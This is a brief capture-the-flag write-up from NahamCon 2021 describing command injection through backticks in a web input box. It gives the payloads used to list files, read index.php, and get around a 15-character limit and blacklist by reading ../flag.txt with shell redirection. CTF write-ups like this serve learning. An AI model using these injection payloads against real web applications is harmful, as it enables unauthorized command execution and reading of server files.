Nahamcon 2021


It is simple command injection in the input box we can use ` characters


all commands have to be enclosed in `` chars

now if we list files using


we can see index.php when we

`cat index.php`

we can see the code! certain characters are blacklisted we can only enter command less that 15 chars but there is no flag.txt here, if we simply execute

`ls ../`

then we can see flag.txt

`cat ../flag.txt`

fails because length of payload exceeds 15

payload to get flag :

linux redirection character! < is NOT blacklisted!

`< ../flag.txt`
Published on : 15 Mar 2021